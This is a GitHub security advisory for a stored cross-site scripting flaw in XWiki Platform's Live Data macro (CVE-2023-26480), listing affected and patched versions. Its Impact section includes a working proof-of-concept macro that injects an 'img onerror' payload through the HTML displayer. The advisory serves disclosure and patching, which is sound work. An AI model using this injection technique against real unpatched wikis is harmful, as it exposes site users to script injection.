GHSA-32fq-m2q5-h83g: XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data

1. GitHub Advisory Database
2. GitHub Reviewed
3. CVE-2023-26480

XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data

High severity GitHub Reviewed Published Mar 1, 2023 in xwiki/xwiki-platform • Updated Mar 3, 2023

Package

maven org.xwiki.platform:xwiki-platform-livedata-macro (Maven)

Affected versions

>= 12.10, < 13.10.10

>= 14.0, < 14.4.7

>= 14.5, < 14.9

Patched versions

13.10.10

14.4.7

14.9

Impact

A user without script rights can introduce a stored XSS by using the Live Data macro.

For instance:

{{liveData id="movies" properties="title,description"}}
{
  "data": {
    "count": 1,
    "entries": [
      {
        "title": "Meet John Doe",
        "url": "https://www.imdb.com/title/tt0033891/",
        "description": "<img onerror='alert(1)' src='foo' />"
      }
    ]
  },
  "meta": {
    "propertyDescriptors": [
      {
        "id": "title",
        "name": "Title",
        "visible": true,
        "displayer": {"id": "link", "propertyHref": "url"}
      },
      {
        "id": "description",
        "name": "Description",
        "visible": true,
        "displayer": "html"
      }
    ]
  }
}
{{/liveData}}

Patches

This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.

Workarounds

No known workaround.

References

https://jira.xwiki.org/browse/XWIKI-20143

For more information

If you have any questions or comments about this advisory:

• Open an issue in Jira
• Email us at Security ML

References

• GHSA-32fq-m2q5-h83g
• https://nvd.nist.gov/vuln/detail/CVE-2023-26480
• xwiki/xwiki-platform@23d5ea9
• xwiki/xwiki-platform@556e782
• https://jira.xwiki.org/browse/XWIKI-20143

Published by the National Vulnerability Database

Mar 2, 2023

Published to the GitHub Advisory Database

Mar 3, 2023